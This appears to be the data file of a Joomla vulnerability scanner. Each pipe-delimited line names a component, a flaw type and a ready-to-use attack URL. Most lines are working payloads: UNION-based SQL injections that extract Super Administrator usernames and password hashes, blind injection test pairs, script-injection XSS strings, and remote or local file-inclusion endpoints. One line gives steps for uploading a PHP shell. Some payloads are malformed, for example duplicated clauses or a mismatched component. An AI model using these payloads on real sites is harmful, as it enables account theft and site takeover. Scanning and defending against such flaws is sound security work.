Component: com_beamospetition XSS  Vulnerability Versions Affected: 1.0.12|/components/com_beamospetition/|/index.php?option=com_beamospetition&func=sign&pet='><script>alert(1)</script>
Component: beamospetition SQL Injection Vulnerability variant 2 Version Affected: N/A|/components/com_beamospetition/|/index.php?option=com_beamospetition&func=sign&mpid=-9999'%20union%20select%200,1,concat(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_flashmagazinedeluxe SQL Injection Vulnerability Versions Affected: N/A|/components/com_flashmagazinedeluxe/|/index.php?option=com_flashmagazinedeluxe&Itemid=10&task=magazine&mag_id=-4+union+select+1,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: pcchess Blind SQL Injection Vulnerability  Versions Affected: N/A|/components/com_pcchess/|/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=1::/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=2
Component: PC CookBook Blind  SQL Injection Vulnerability  Versions Affected: N/A|/components/com_pccookbook/|/index.php?option=com_pccookbook&page=viewrecipe&recipe_id=1+and+1=1::/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=2
Component: com_waticketsystem Blind SQL Injection Vulnerability Versions Affected: N/A|/components/com_waticketsystem/|/index.php?option=com_waticketsystem&act=category&catid=1+and+1=1::/index.php?option=com_waticketsystem&act=category&catid=1+and+1=2
Component: com_eventing Blind SQL Injection Vulnerability Versions Affected: 1.6.x|/components/com_eventing/|/index.php?option=com_eventing&catid=1+and+1=1::/index.php?option=com_eventing&catid=1+and+1=2
Component: com_sitemap Remote File Inclusion  Vulnerability Versions Affected: N/A|/components/com_sitemap/sitemap.xml.php|/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
Component: com_rss DOS  Vulnerability Versions Affected: Joomla! <= 1.0.7|/components/com_rss/|/index2.php?option=com_rss&feed=test
Component: com_Jambook Remote File Inclusion Vulnerability Versions Affected: 1.0 beta7|/components/com_Jambook/jambook.php|/components/com_Jambook/jambook.php?mosConfig_absolute_path=
Component: com_akogallery SQL Injection Vulnerability Versions Affected: N/A|/components/com_akogallery|/index.php?option=com_akogallery&Itemid=1&func=detail&id=-334455+union+select+null,null,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_gsticketsystem (catid) Blind SQL Injection Vulnerability Versions Affected: N/A|/components/com_gsticketsystem/|/index.php?option=com_gsticketsystem&controller=entrypoint&task=viewCategory&catid=1+and+1=1::/index.php?option=com_gsticketsystem&controller=entrypoint&task=viewCategory&catid=1+and+1=2
Component:  com_casino_blackjack SQL Injection Vulnerability Versions Affected: 0.3.1 <=|/components/com_casino_blackjack/|/index.php?option=com_casino_blackjack&game_mode=Blackjack&shuffle=1&Itemid=1+AND+1=2+UNION+SELECT+concat(username,0x3a,password),1,2+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_casinobase SQL Injection Vulnerability Versions Affected: 0.3.1 <=|/components/com_casinobase/|/index.php?option=com_casinobase&Itemid=1+AND+1=2+UNION+SELECT+concat(username,0x3a,password),1,2+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_casino_videopoker SQL Injection Vulnerability Versions Affected: 0.3.1 <=|/components/com_casino_videopoker/|/index.php?option=com_casino_videopoker&Itemid=1+AND+1=2+UNION+SELECT+concat(username,0x3a,password),1,2+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_agoragroup AgoraGroup Blind SQL Injection Vulnerability Versions Affected:  0.3.5.3 <=|/components/com_agoragroup/|/index.php?option=com_agoragroup&con=groupdetail&id=1+and+1=1::/index.php?option=com_agoragroup&con=groupdetail&id=1+and+1=2
Component:  com_jvideo SQL Injection Vulnerability Versions effected: 0.3.x|/components/com_jvideo/|/index.php?option=com_jvideo&view=user&user_id=62+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Seminar com_seminar Blind SQL Injection Vulnerability Versions effected: 2.0.4 <=|/components/com_seminar/|/index.php?option=com_seminar&task=View_seminar&id=1+and+1=1::index.php?option=com_seminar&task=View_seminar&id=1+and+1=2
Component:  Omilen Photo Gallery LFI Vulnerability Versions effected: 0.5b <=|/components/com_omphotogallery/|/index.php?option=com_omphotogallery&controller=
Component:  RFI Vulnerability Versions effected: 2.1b7 <=|/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php|/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=
Component:  com_bsadv Boy Scout Advancement SQL Injection Vulnerability Versions effected: 0.3 <=|/components/com_bsadv/|/index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,concat(username,0x3a,password),3,4+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_rsgallery2 Attacker's Backdoored Vulnerability Versions effected: legacy_1.14.3, 2.0.0b1|/components/com_rsgallery2/|According to joomlacode.org, the author's SVN account was compromised and the attacker injected a remote command execution backdoor. If you have access to the source code, search for and examine uses of eval and exec in /components/com_rsgallery2
Component:  com_agora Remote File Upload Vulnerability Versions effected: 3.0.0 <=|/components/com_agora/|Requires Member registration to verify.  After registration, go to site.com/index.php?option=com_agora&task=upload and upload a php shell. Check if it's at /components/com_agora/img/members/0/yourshell.php.
Component:  com_juser SQL Injection Vulnerability Versions effected: N/A|/components/com_juser/|/index.php?option=com_juser&task=show_profile&id=+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_mosres (property_uid) SQL Injection Vulnerability Versions effected: 4.5.2 <=|/components/com_mosres/|/index.php?option=com_mosres&task=viewproperty&property_uid=99+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_school SQL Injection Vulnerability Versions effected: 1.4 <=|/components/com_school/|/index.php?option=com_school&Itemid=null&func=showclass&classid=99+union+select+concat(username,0x3a,password),null+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_moofaq MooFAQ LFI Vulnerability Versions effected: 1.0 <=|/components/com_moofaq/|/components/com_moofaq/includes/file_includer.php?gzip=0&file=
Component:  com_portafolio (cid) SQL Injection Vulnerability Versions effected: N/A|/components/com_portafolio/|/index.php?option=com_portafolio&task=viewcat&cid=-1+and+1=2+union+select+1,2,3,4,5,6,7,0x3A6166626337346430363332333063626162356432393066646130393633636537,9--&Itemid=5
Component:  com_booklibrary RFI Vulnerability Versions effected: 1.5.2.4 <=|/components/com_booklibrary/|/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=
Component:  com_media_library RFI Vulnerability Versions effected: 1.5.3 <=|/components/com_media_library/|/com_media_library/toolbar_ext.php?mosConfig_absolute_path=
Component:  RFI Vulnerability Versions effected: N/A|/components/com_realestatemanager/|/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=
Component:  com_vehiclemanager RFI Vulnerability Versions effected: 1.0 <=|/components/com_vehiclemanager/|/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=
Component:  com_projectfork LFI Vulnerability Versions effected: 2.0.10 <=|/components/com_projectfork/|/index.php?option=com_projectfork&section=
Component: com_ijoomla_rss Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_ijoomla_rss/|/index.php?option=com_ijoomla_rss&act=xml&cat=1+and+1=1::/index.php?option=com_ijoomla_rss&act=xml&cat=1+and+1=2
Component: com_jumi (fileid) Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_jumi/|/index.php?option=com_jumi&fileid=1+and+1=1::/index.php?option=com_jumi&fileid=1+and+1=2
Component:  com_tickets (id) SQL Injection Vulnerability Versions effected: N/A|/components/com_tickets/|/index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_pinboard Remote File Upload Vulnerability Versions effected: N/A|/components/com_pinboard/|/components/com_pinboard/popup/popup.php?option=showupload
Component: com_amocourse (catid) SQL Injection Vulnerability Versions effected: N/A|/components/com_amocourse/|/index.php?option=com_amocourse&task=view&view=category&catid=1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_pinboard SQL Injection Vulnerability Versions effected: N/A|/components/com_pinboard/|/index.php?option=com_pinboard&Itemid=1&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,concat(username,0x3a,password),8,9,10%20from%20jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_bookflip(book_id) SQL Injection Vulnerability Versions effected: 2.1 <=|/components/com_bookflip/|/index.php?option=com_bookflip&book_id=-9999+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_k2 (sectionid) SQL Injection Vulnerability Versions effected: 1.0.1 Beta <=|/components/com_k2/|/index.php?option=com_k2&view=itemlist&category=null'+and+1=2+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_php (id) Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_php/|/index.php?option=com_php&Itemid=[INSERT]&id=[INSERT]+and+1=1::/index.php?option=com_php&Itemid=[INSERT]&id=[INSERT]+and+1=2
Component:  mod_letterman XSS Vulnerability Versions effected: 1.2.4 <=|/components/mod_letterman/|/index.php?option=com_letterman&task=view&id=1&Itemid=1%22%3E%3Cscript%3Ealert(1);%3C/script%3E
Component: com_googlebase VirtueMart  RFI Vulnerability Versions Affected: 1.1 <= |/components/com_googlebase/|/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=
Component: com_googlebase VirtueMart  RFI Vulnerability Versions Affected: 1.1 <= |/administrator/components/com_googlebase/|/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=
Component: J! Reactions RFI Vulnerability Versions Affected: 1.8.1 <= |/administrator/components/com_jreactions/|/administrator/components/com_jreactions/langset.php?comPath=
Component:  mosListMessenger com_lmo SQL Injection Vulnerability Versions effected: 2.1.0 <=|/components/com_lm/|/index.php?option=com_lms&task=showTests&cat=-1+union+select+1,concat(username,0x3a,password),3,4,5,6,7+from jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_akobook (gbid) Guestbook SQL Injection Vulnerability Versions effected: SE 2.3 <= |/components/com_akobook/|N/A 
Component: com_akobook Guestbook XSS Vulnerability Versions effected: SE 3.42 <= |/components/com_akobook/|Input passed to the "gbmail"/"gbpage" parameters in the signing page (generally index.php?option=com_akobook&func=sign) is not properly sanitised. Submit gbmail as a' onblur=alert(0) a='. To confirm, go back to the signing page, click the mail input box and press Tab; the XSS fires.
Component:  com_propertylab (auction_id) SQL Injection Vulnerability Versions effected: N/A|/components/com_propertylab/|/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_mailarchive XSS Vulnerability Versions effected: N/A|/components/com_mailarchive/|/index.php?option=com_mailarchive&Itemid=212&view=EXP&perpage=20&revdate=on&datestart=&dateend=&author="><script>alert(0)</script>&subject="><script>alert(0)</script>&exactsubject="><script>alert(0)</script>&search=&submit=Apply
Component: com_journal XSS  Injection Vulnerability Versions effected: N/A|/components/com_journal/|/index.php?option=com_journal&Itemid=213&page=index&journal=default&view=FULL&logfile=ALL&icon=ALL&version=ALL&buildstart=&buildend=&perpage=20&search="><script>alert(0)</script>&find=Find
Component: com_simplefaq SQL Injection Vulnerability Versions effected: N/A|/components/com_simplefaq/|/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,0,concat(username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_gallery SQL Injection Vulnerability Versions effected: N/A|/components/com_gallery/|/index.php?option=com_gallery&Itemid=0&func=detail&id=-99999/**/union/**/select/**/0,0,concat (username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_category (cat_id) SQL Injection Vulnerability Versions effected: N/A|/components/com_category/|/index.php?option=com_category&id=12&task=view&color=3&cat_id=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_jobline (search) Blind SQL Injection Vulnerability Versions effected: 1.3.1 <=|/components/com_jobline/|/index.php?option=com_jobline&task=results&Itemid=&search=%' and 1=1 and '%'='::/index.php?option=com_jobline&task=results&Itemid=&search=%' and 1=2 and '%'='
Component:  com_knowledgebase addon FCKEditor  Abuse of Functionalities Vulnerability Versions effected: 2.6.1.4 <=|/components/com_knowledgebase/fckeditor/fckeditor.js|Certain versions of FCKeditor have multiple security vulnerabilities.
Component: X-Shop RFI Vulnerability Versions Affected: 1.7 <= |/administrator/components/com_x-shop/|/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=
Component: Taskhopper (com_thopper) RFI Vulnerability Versions effected: 1.1 <=|/components/com_thopper/|/com_thopper/inc/contact_type.php?mosConfig_absolute_path=
Component:  com_asortyment (katid) SQL Injection Vulnerability Versions effected: N/A|/components/com_asortyment/|/index.php?option=com_asortyment&Itemid=36&lang=pl&task=kat&katid=-9999999+union+select+0,concat(username,0x3a,password),2,3,4,5,6,7,8,9+from+jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: com_awesom SQL Injection Vulnerability Versions effected: N/A|/components/com_awesom/|/index.php?option=com_awesom&Itemid=99&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_be_it_easypartner RFI  Vulnerability Versions effected: N/A|/components/com_be_it_easypartner/|/components/com_be_it_easypartner/be_it_easypartner.ajax.php?mosConfig_absolute_path=
Component:  com_blog (pid) SQL Injection Vulnerability Versions effected: N/A|/components/com_blog/|/index.php?option=com_blog&name=aria-Security.Net&task=view&pid=\x27\x6F\x72 SELECT *
Component:  com_activities SQL Injection Vulnerability Versions effected: N/A|/components/com_activities/|/index.php?option=com_activities&Itemid=51&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_catalogshop SQL Injection Vulnerability Versions effected: 1.0 beta 1 <=|/components/com_catalogshop/|/index.php?option=com_catalogshop&Itemid=99&func=detail&id=-1/**/union/**/select/**/null,null,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_guide SQL Injection Vulnerability Versions effected: N/A|/components/com_guide/|/index.php?option=com_guide&category=-999999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_clickheat  RFI Vulnerability Versions effected: N/A|/components/com_ clickheat/|/index.php?option=com_ clickheat&task=
Component:  com_clickheat XSS Vulnerability Versions effected: N/A|/components/com_clickheat/|/index.php?option=com_ clickheat&task=http://ha.ckers.org/xss.js
Component:  Community Exchange com_cx (user_id) SQL Injection Vulnerability Versions effected: 1.0.0 <=|/components/com_cx/|/index.php?option=com_cx&task=showrating&user_id=-3+union+select+1,concat(username,0x3a,password),3+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_eventlist (did) SQL Injection Vulnerability Versions effected: 0.8 <=|/components/com_eventlist/|/index.php?option=com_eventlist&func=details&did=9999999999999+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_estateagent SQL Injection Vulnerability Versions effected: 0.1 <=|/components/com_estateagent/|/index.php?option=com_estateagent&Itemid=99&func=showObject&info=contact&objid=-9999/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*&results=null
Component:  com_downloads(cat) SQL Injection Vulnerability Versions effected: N/A|/components/com_downloads/|/index.php?option=com_downloads&Itemid=99&func=selectcat&cat=-1/**/union/**/select/**/0,concat(username,0x3a,password),2/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*  
Component:  com_detail(cat) SQL Injection Vulnerability Versions effected: N/A|/components/com_detail/|/index.php?option=com_detail&Itemid=99&id=-1/**/union/**/select/**/0,1,2,3, /index.php?option=com_downloads&Itemid=null&func=selectcat&cat=-1/**/union/**/select/**/0,concat(username,0x3a,password),2,3/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_datsogallery SQL Injection Vulnerability Versions effected: 1.3.1 <=|/components/com_datsogallery/|/index.php?option=com_datsogallery&func=detail&id=-999+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,1,2,3,4,5+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: Dada Mail Manager Component Remote File Inclusion Vulnerability   Version Affected:   2.6 <= |/administrator/components/|/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
Component: Facile Forms RFI Vulnerability	Versions Affected: N/A|/components/com_facileforms/|/components/com_facileforms/facileforms.frame.php?ff_compath=
Component:  com_foevpartners SQL Injection Vulnerability Versions effected: N/A|/components/com_foevpartners/|/index.php?option=com_listoffreeads&AdId=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_inter SQL Injection Vulnerability Versions effected: N/A|/components/com_inter/|/index.php?option=com_inter&op=The-0utl4wz&id=-11111111111111/**/union/**/select/**/0,1,2,3,concat(username,0x3a,password),5,6,7,8,9/**/from/**/jos_user+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_emcomposer SQL Injection Vulnerability Versions effected: N/A|/components/com_emcomposer/|N/A
Component:  com_ixxocart SQL Injection Vulnerability Versions effected: 3.9.6.1 <|/components/com_ixxocart/|/index.php?option=com_ixxocart&Itemid=1&p=catalog&parent=1\x27\x4F\x52+SELECT+*&pg=1
Component:  com_publication SQL Injection Vulnerability Versions effected: N/A|/components/com_publication/|/index.php?option=com_publication&task=view&pid=-9999999+union/**/select+0,concat(username,0x3a,password),0,0,0,0,0/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_lexikon SQL Injection Vulnerability Versions effected: N/A|/components/com_lexikon/|/index.php?option=com_lexikon&id=-1/**/union/**/select/**/0,concat(username,0x3a,password),2/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/* 
Component:  com_filebase SQL Injection Vulnerability Versions effected: N/A|/components/com_filebase/|/index.php?option=com_filebase&Itemid=-999&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),1,2/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: Almond Classifieds com_aclassf (id) Blind SQL Injection Vulnerability Versions effected: 5.6.2  <=|/components/com_aclassf/|/index.php?option=com_aclassf&Itemid=26&ct=merch5&md=details&id=1+and+1=1::/index.php?option=com_aclassf&Itemid=26&ct=merch5&md=details&id=1+and+1=2
Component: Almond Classifieds com_aclassf (replid) Blind SQL Injection Vulnerability Versions effected: 7.5  <=|/components/com_aclassf/|/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=1+and+1=1::/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=1+and+1=2
Component: Almond Classifieds com_aclassf (addr) XSS Vulnerability Versions effected: 7.5  <=|/components/com_aclassf/|/components/com_aclassf/gmap.php?addr="><script>alert(1)</script>
Component:  com_pms SQL Injection Vulnerability Versions effected: 2.0.4 <=|/components/com_pms/|Requires a valid user account on the target site. For more information, see http://milw0rm.com/exploits/9398
Component:  com_joomloads SQL Injection Vulnerability Versions effected: N/A|/components/com_joomloads/|/index.php?option=com_joomloads&view=package&Itemid=2&packageId=-156+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users--
Component: Kunena Forums com_kunena (func) Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_kunena/|/index.php?option=com_kunena&Itemid=-3&func=1+and+1=1::/index.php?option=com_kunena&Itemid=-3&func=1+and+1=2
Component:  com_misterestate Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_misterestate/|/index.php?option=com_misterestate&act=mesearch&task=showMESR&tmpl=component&src_cat=0&country=no&state=no&town=no&district=no&mesearch=Start+Search&searchstring=1%'+and+1=1::/index.php?option=com_misterestate&act=mesearch&task=showMESR&tmpl=component&src_cat=0&country=no&state=no&town=no&district=no&mesearch=Start+Search&searchstring=1%'+and+1=2
Template: be2004-2 File Inclusion Vulnerability   Versions Affected: 2 <= |/templates/be2004-2/|/templates/be2004-2/index.php?mosConfig_absolute_path=
Module: AutoStand Category mod_as_category     File Inclusion Vulnerability     Versions Affected: 1.x <= |/modules/mod_as_category.php|/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=
Module: Quick Question module    Versions Affected: 4.5.1 <= |/modules/mod_quick_question.php|N/A
Module: Module mod_pxt     File Inclusion Vulnerability     Versions Affected: N/A     |/modules/mod_pxt/|/modules/mod_pxt/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=
Module: mod_calendar    File Inclusion Vulnerability     Versions Affected: N/A|/modules/mod_calendar.php|/modules/mod_calendar.php?absolute_path=
Extension:  UIajaxIM XSS Vulnerability Versions effected: 1.1 <=|/ajaxim/|Requires a valid user account on the target site. For more information, see http://milw0rm.com/exploits/9244
